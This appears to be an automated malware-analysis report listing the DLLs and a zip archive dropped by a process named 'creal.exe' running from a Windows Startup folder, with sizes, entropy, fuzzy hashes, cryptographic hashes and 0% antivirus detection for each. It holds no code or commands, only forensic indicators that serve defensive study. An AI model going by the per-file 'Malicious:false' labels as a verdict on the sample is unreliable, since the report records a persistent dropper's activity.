                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):16384
                                                                                                                                                                                                              Entropy (8bit):5.235115741550938
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:XTRgffnRaNfBj9xih1LPK73jm6AXiN4rSRIh42gDhgvrjcqgCieT3WQ:XafgNpj9cHW3jqXeBRamDOZgCieT
                                                                                                                                                                                                              MD5:1E201DF4B4C8A8CD9DA1514C6C21D1C4
                                                                                                                                                                                                              SHA1:3DC8A9C20313AF189A3FFA51A2EAA1599586E1B2
                                                                                                                                                                                                              SHA-256:A428372185B72C90BE61AC45224133C4AF6AE6682C590B9A3968A757C0ABD6B4
                                                                                                                                                                                                              SHA-512:19232771D4EE3011938BA2A52FA8C32E00402055038B5EDF3DDB4C8691FA7AE751A1DC16766D777A41981B7C27B14E9C1AD6EBDA7FFE1B390205D0110546EE29
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):15360
                                                                                                                                                                                                              Entropy (8bit):5.133714807569085
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:JZNGXEgvUh43G6coX2SSwmPL4V7wTdDlpaY2cqgWjvE:EVMhuGGF2L4STdDyYWgWjvE
                                                                                                                                                                                                              MD5:76C84B62982843367C5F5D41B550825F
                                                                                                                                                                                                              SHA1:B6DE9B9BD0E2C84398EA89365E9F6D744836E03A
                                                                                                                                                                                                              SHA-256:EBCD946F1C432F93F396498A05BF07CC77EE8A74CE9C1A283BF9E23CA8618A4C
                                                                                                                                                                                                              SHA-512:03F8BB1D0D63BF26D8A6FFF62E94B85FFB4EA1857EB216A4DEB71C806CDE107BA0F9CC7017E3779489C5CEF5F0838EDB1D70F710BCDEB629364FC288794E6AFE
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):35840
                                                                                                                                                                                                              Entropy (8bit):5.928082706906375
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:8bEkzS7+k9rMUb8cOe9rs9ja+V/Mhjh56GS:8bEP779rMtcOCs0I/Mhf
                                                                                                                                                                                                              MD5:B41160CF884B9E846B890E0645730834
                                                                                                                                                                                                              SHA1:A0F35613839A0F8F4A87506CD59200CCC3C09237
                                                                                                                                                                                                              SHA-256:48F296CCACE3878DE1148074510BD8D554A120CAFEF2D52C847E05EF7664FFC6
                                                                                                                                                                                                              SHA-512:F4D57351A627DD379D56C80DA035195292264F49DC94E597AA6638DF5F4CF69601F72CC64FC3C29C5CBE95D72326395C5C6F4938B7895C69A8D839654CFC8F26
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):12288
                                                                                                                                                                                                              Entropy (8bit):4.799063285091512
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:nkCfXASTMeAk4OepIXcADp/X6RcqgO5vE:ZJMcPepIXcAD563gO5vE
                                                                                                                                                                                                              MD5:BA46602B59FCF8B01ABB135F1534D618
                                                                                                                                                                                                              SHA1:EFF5608E05639A17B08DCA5F9317E138BEF347B5
                                                                                                                                                                                                              SHA-256:B1BAB0E04AC60D1E7917621B03A8C72D1ED1F0251334E9FA12A8A1AC1F516529
                                                                                                                                                                                                              SHA-512:A5E2771623DA697D8EA2E3212FBDDE4E19B4A12982A689D42B351B244EFBA7EFA158E2ED1A2B5BC426A6F143E7DB810BA5542017AB09B5912B3ECC091F705C6E
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):754688
                                                                                                                                                                                                              Entropy (8bit):7.624959985050181
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12288:I1UrmZ9HoxJ8gf1266y8IXhJvCKAmqVLzcrZgYIMGv1iLD9yQvG6h9:gYmzHoxJFf1p34hcrn5Go9yQO6L
                                                                                                                                                                                                              MD5:3F20627FDED2CF90E366B48EDF031178
                                                                                                                                                                                                              SHA1:00CED7CD274EFB217975457906625B1B1DA9EBDF
                                                                                                                                                                                                              SHA-256:E36242855879D71AC57FBD42BB4AE29C6D80B056F57B18CEE0B6B1C0E8D2CF57
                                                                                                                                                                                                              SHA-512:05DE7C74592B925BB6D37528FC59452C152E0DCFC1D390EA1C48C057403A419E5BE40330B2C5D5657FEA91E05F6B96470DDDF9D84FF05B9FD4192F73D460093C
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):27648
                                                                                                                                                                                                              Entropy (8bit):5.792654050660321
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:hBwi/rOF26VZW1n0n/Is42g9qhrnW0mvPauYhz35sWJftjb1Ddsia15gkbQ0e1:/L/g28Ufsxg9GmvPauYLxtX1D/kf
                                                                                                                                                                                                              MD5:290D936C1E0544B6EC98F031C8C2E9A3
                                                                                                                                                                                                              SHA1:CAEEA607F2D9352DD605B6A5B13A0C0CB1EA26EC
                                                                                                                                                                                                              SHA-256:8B00C859E36CBCE3EC19F18FA35E3A29B79DE54DA6030AAAD220AD766EDCDF0A
                                                                                                                                                                                                              SHA-512:F08B67B633D3A3F57F1183950390A35BF73B384855EAAB3AE895101FBC07BCC4990886F8DE657635AD528D6C861BC2793999857472A5307FFAA963AA6685D7E8
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):67072
                                                                                                                                                                                                              Entropy (8bit):6.060461288575063
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:nqctkGACFI5t35q2JbL0UbkrwwOoKXyMH1B7M9rMdccdWxRLpq:nqctkGACFI5t35q2JbgrwwOoqLTM9rMh
                                                                                                                                                                                                              MD5:5782081B2A6F0A3C6B200869B89C7F7D
                                                                                                                                                                                                              SHA1:0D4E113FB52FE1923FE05CDF2AB9A4A9ABEFC42E
                                                                                                                                                                                                              SHA-256:E72E06C721DD617140EDEBADD866A91CF97F7215CBB732ECBEEA42C208931F49
                                                                                                                                                                                                              SHA-512:F7FD695E093EDE26FCFD0EE45ADB49D841538EB9DAAE5B0812F29F0C942FB13762E352C2255F5DB8911F10FA1B6749755B51AAE1C43D8DF06F1D10DE5E603706
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):10752
                                                                                                                                                                                                              Entropy (8bit):4.488437566846231
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:tpVVdJvbrqTu6ZdpvY0IluLfcC75JiC4cs89EfqADwhDTAbcX6gn/7EC:5VddiT7pgTctdErDwDTicqgn/7
                                                                                                                                                                                                              MD5:289EBF8B1A4F3A12614CFA1399250D3A
                                                                                                                                                                                                              SHA1:66C05F77D814424B9509DD828111D93BC9FA9811
                                                                                                                                                                                                              SHA-256:79AC6F73C71CA8FDA442A42A116A34C62802F0F7E17729182899327971CFEB23
                                                                                                                                                                                                              SHA-512:4B95A210C9A4539332E2FB894D7DE4E1B34894876CCD06EEC5B0FC6F6E47DE75C0E298CF2F3B5832C9E028861A53B8C8E8A172A3BE3EC29A2C9E346642412138
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):10240
                                                                                                                                                                                                              Entropy (8bit):4.730605326965181
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:MJVVdJvbrqTu6ZdpvY0IluLfcC75JiCKs89EVAElIijKDQGrbMZYJWJcX6gbW6s:CVddiT7pgTctEEaEDKDlMCWJcqgbW6
                                                                                                                                                                                                              MD5:4D9C33AE53B38A9494B6FBFA3491149E
                                                                                                                                                                                                              SHA1:1A069E277B7E90A3AB0DCDEE1FE244632C9C3BE4
                                                                                                                                                                                                              SHA-256:0828CAD4D742D97888D3DFCE59E82369317847651BBA0F166023CB8ACA790B2B
                                                                                                                                                                                                              SHA-512:BDFBF29198A0C7ED69204BF9E9B6174EBB9E3BEE297DD1EB8EB9EA6D7CAF1CC5E076F7B44893E58CCF3D0958F5E3BDEE12BD090714BEB5889836EE6F12F0F49E
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):10240
                                                                                                                                                                                                              Entropy (8bit):4.685843290341897
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:6ZVVdJvbrqTu6ZdpvY0IluLfcC75JiCKs89EMz3DHWMoG4BcX6gbW6O:IVddiT7pgTctEEO3DLoHcqgbW6
                                                                                                                                                                                                              MD5:8F4313755F65509357E281744941BD36
                                                                                                                                                                                                              SHA1:2AAF3F89E56EC6731B2A5FA40A2FE69B751EAFC0
                                                                                                                                                                                                              SHA-256:70D90DDF87A9608699BE6BBEDF89AD469632FD0ADC20A69DA07618596D443639
                                                                                                                                                                                                              SHA-512:FED2B1007E31D73F18605FB164FEE5B46034155AB5BB7FE9B255241CFA75FF0E39749200EB47A9AB1380D9F36F51AFBA45490979AB7D112F4D673A0C67899EF4
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):119192
                                                                                                                                                                                                              Entropy (8bit):6.6016214745004635
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:+qvQ1Dj2DkX7OcujarvmdlYNABCmgrP4ddbkZIecbWcFML/UXzlghzdMFw84hzk:+qvQ1D2CreiABCmgYecbWVLUD6h+b4ho
                                                                                                                                                                                                              MD5:BE8DBE2DC77EBE7F88F910C61AEC691A
                                                                                                                                                                                                              SHA1:A19F08BB2B1C1DE5BB61DAF9F2304531321E0E40
                                                                                                                                                                                                              SHA-256:4D292623516F65C80482081E62D5DADB759DC16E851DE5DB24C3CBB57B87DB83
                                                                                                                                                                                                              SHA-512:0DA644472B374F1DA449A06623983D0477405B5229E386ACCADB154B43B8B083EE89F07C3F04D2C0C7501EAD99AD95AECAA5873FF34C5EEB833285B598D5A655
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):49528
                                                                                                                                                                                                              Entropy (8bit):6.662491747506177
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:wPIyGVrxmKqOnA4j3z6Su77A+i0QLxi9z9Rtii9zn+:fBr87uW1nA8QLx+zrti+zn+
                                                                                                                                                                                                              MD5:F8DFA78045620CF8A732E67D1B1EB53D
                                                                                                                                                                                                              SHA1:FF9A604D8C99405BFDBBF4295825D3FCBC792704
                                                                                                                                                                                                              SHA-256:A113F192195F245F17389E6ECBED8005990BCB2476DDAD33F7C4C6C86327AFE5
                                                                                                                                                                                                              SHA-512:BA7F8B7AB0DEB7A7113124C28092B543E216CA08D1CF158D9F40A326FB69F4A2511A41A59EA8482A10C9EC4EC8AC69B70DFE9CA65E525097D93B819D498DA371
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):71448
                                                                                                                                                                                                              Entropy (8bit):6.244468463173389
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:FRaPPkvNV036Fi9PQ1TUT8TIL11Miu0FIpOn27SyTxq:janCNV064YRUT8TIL11MV0FIpOn2S
                                                                                                                                                                                                              MD5:70FB0B118AC9FD3292DDE530E1D789B8
                                                                                                                                                                                                              SHA1:4ADC8D81E74FC04BCE64BAF4F6147078EEFBAB33
                                                                                                                                                                                                              SHA-256:F8305023F6AD81DDC7124B311E500A58914B05A9B072BF9A6D079EA0F6257793
                                                                                                                                                                                                              SHA-512:1AB72EA9F96C6153B9B5D82B01354381B04B93B7D58C0B54A441B6A748C81CCCD2FC27BB3B10350AB376FF5ADA9D83AF67CCE17E21CCBF25722BAF1F2AEF3C98
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):84760
                                                                                                                                                                                                              Entropy (8bit):6.58578024183428
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:ES7z7Sj2u5ia5ifC83zYLzbCK8CkotIpCVF7SyTUxIS:/7z+jw3MzCNCkotIpCVF+
                                                                                                                                                                                                              MD5:90F58F625A6655F80C35532A087A0319
                                                                                                                                                                                                              SHA1:D4A7834201BD796DC786B0EB923F8EC5D60F719B
                                                                                                                                                                                                              SHA-256:BD8621FCC901FA1DE3961D93184F61EA71068C436794AF2A4449738CCF949946
                                                                                                                                                                                                              SHA-512:B5BB1ECC195700AD7BEA5B025503EDD3770B1F845F9BEEE4B067235C4E63496D6E0B19BDD2A42A1B6591D1131A2DC9F627B2AE8036E294300BB6983ECD644DC8
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):182784
                                                                                                                                                                                                              Entropy (8bit):6.193615170968096
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3072:YRAMUp3K6YoDssyudy4VcRG+nR3hnW3mjwwOdkS9S7iSSTLkK/jftw3buz:Y6MyK65ssy+MG+LnSUwjD9zSSTLL/jl8
                                                                                                                                                                                                              MD5:0572B13646141D0B1A5718E35549577C
                                                                                                                                                                                                              SHA1:EEB40363C1F456C1C612D3C7E4923210EAE4CDF7
                                                                                                                                                                                                              SHA-256:D8A76D1E31BBD62A482DEA9115FC1A109CB39AF4CF6D1323409175F3C93113A7
                                                                                                                                                                                                              SHA-512:67C28432CA8B389ACC26E47EB8C4977FDDD4AF9214819F89DF07FECBC8ED750D5F35807A1B195508DD1D77E2A7A9D7265049DCFBFE7665A7FD1BA45DA1E4E842
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):125208
                                                                                                                                                                                                              Entropy (8bit):6.126925801052556
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3072:PGTMA4TPG40srrYLGNyf/ECZGKgyWLRECBIpLPIuE:Otgp0swLvf/EKCkE
                                                                                                                                                                                                              MD5:452305C8C5FDA12F082834C3120DB10A
                                                                                                                                                                                                              SHA1:9BAB7B3FD85B3C0F2BEDC3C5ADB68B2579DAA6E7
                                                                                                                                                                                                              SHA-256:543CE9D6DC3693362271A2C6E7D7FC07AD75327E0B0322301DD29886467B0B0E
                                                                                                                                                                                                              SHA-512:3D52AFDBC8DA74262475ABC8F81415A0C368BE70DBF5B2BD87C9C29CA3D14C44770A5B8B2E7C082F3ECE0FD2BA1F98348A04B106A48D479FA6BD062712BE8F7C
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):253208
                                                                                                                                                                                                              Entropy (8bit):6.560002521238215
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6144:kgd/2mZLgPFIY9qWM53pLW1AepppzoeteKU:JZLgPykeKU
                                                                                                                                                                                                              MD5:F78F9855D2A7CA940B6BE51D68B80BF2
                                                                                                                                                                                                              SHA1:FD8AF3DBD7B0EA3DE2274517C74186CB7CD81A05
                                                                                                                                                                                                              SHA-256:D4AE192BBD4627FC9487A2C1CD9869D1B461C20CFD338194E87F5CF882BBED12
                                                                                                                                                                                                              SHA-512:6B68C434A6F8C436D890D3C1229D332BD878E5777C421799F84D79679E998B95D2D4A013B09F50C5DE4C6A85FCCEB796F3C486E36A10CBAC509A0DA8D8102B18
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):65816
                                                                                                                                                                                                              Entropy (8bit):6.242721496157571
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:uElYij3wzR1lBafLEmIRhFIpOIi7SyHqxn:zYdBaTEmghFIpOIiu
                                                                                                                                                                                                              MD5:8BAEB2BD6E52BA38F445EF71EF43A6B8
                                                                                                                                                                                                              SHA1:4132F9CD06343EF8B5B60DC8A62BE049AA3270C2
                                                                                                                                                                                                              SHA-256:6C50C9801A5CAF0BB52B384F9A0D5A4AA182CA835F293A39E8999CF6EDF2F087
                                                                                                                                                                                                              SHA-512:804A4E19EA622646CEA9E0F8C1E284B7F2D02F3620199FA6930DBDADC654FA137C1E12757F87C3A1A71CEFF9244AA2F598EE70D345469CA32A0400563FE3AA65
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):159512
                                                                                                                                                                                                              Entropy (8bit):6.8453439550985475
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3072:kEVLLSVeexIDteznfV9mNoNMuX4mZp7zuNtIpZ1uV:kEVHbeye9YON1buNN
                                                                                                                                                                                                              MD5:CF8DE1137F36141AFD9FF7C52A3264EE
                                                                                                                                                                                                              SHA1:AFDE95A1D7A545D913387624EF48C60F23CF4A3F
                                                                                                                                                                                                              SHA-256:22D10E2D6AD3E3ED3C49EB79AB69A81AAA9D16AECA7F948DA2FE80877F106C16
                                                                                                                                                                                                              SHA-512:821985FF5BC421BD16B2FA5F77F1F4BF8472D0D1564BC5768E4DBE866EC52865A98356BB3EF23A380058ACD0A25CD5A40A1E0DAE479F15863E48C4482C89A03F
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):35096
                                                                                                                                                                                                              Entropy (8bit):6.462269556682856
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:sgYvrenSE0PcxxQ0zi+m1IpWtz5YiSyvyAMxkEs1:JYTQSCxQ0zlm1IpWt97Sy4xu
                                                                                                                                                                                                              MD5:C0A06AEBBD57D2420037162FA5A3142B
                                                                                                                                                                                                              SHA1:1D82BA750128EB51070CDEB0C69AC75117E53B43
                                                                                                                                                                                                              SHA-256:5673B594E70D1FDAAD3895FC8C3676252B7B675656FB88EF3410BC93BB0E7687
                                                                                                                                                                                                              SHA-512:DDF2C4D22B2371A8602601A05418EF712E03DEF66E2D8E8814853CDD989ED457EFBD6032F4A4A3E9ECCA9915D99C249DFD672670046461A9FE510A94DA085FBF
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):55576
                                                                                                                                                                                                              Entropy (8bit):6.34153194361025
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:3XRnts3McbN6w/xzWSsXZdR1r35IpXtW7Sy56xk3:HRvisXZdR1r5IpXtWz3
                                                                                                                                                                                                              MD5:54C021E10F9901BF782C24D648A82B96
                                                                                                                                                                                                              SHA1:CF173CC0A17308D7D87B62C1169B7B99655458BC
                                                                                                                                                                                                              SHA-256:2E53CC1BFA6E10A4DE7E1F4081C5B952746E2D4FA7F8B9929AD818CE20B2CC9F
                                                                                                                                                                                                              SHA-512:E451226ECE8C34C73E5B31E06FDC1D99E073E6E0651A0C5E04B0CF011E79D0747DA7A5B6C5E94ACA44CFCEB9E85CE3D85AFFF081A574D1F53F115E39E9D4FF6C
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):32536
                                                                                                                                                                                                              Entropy (8bit):6.46409711645548
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):83224
                                                                                                                                                                                                              Entropy (8bit):6.336611500173631
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):124696
                                                                                                                                                                                                              Entropy (8bit):6.265014849176247
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):177432
                                                                                                                                                                                                              Entropy (8bit):5.976278188413444
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):25368
                                                                                                                                                                                                              Entropy (8bit):6.631508961457508
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):36632
                                                                                                                                                                                                              Entropy (8bit):6.358330339853201
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe
                                                                                                                                                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                              Category:dropped
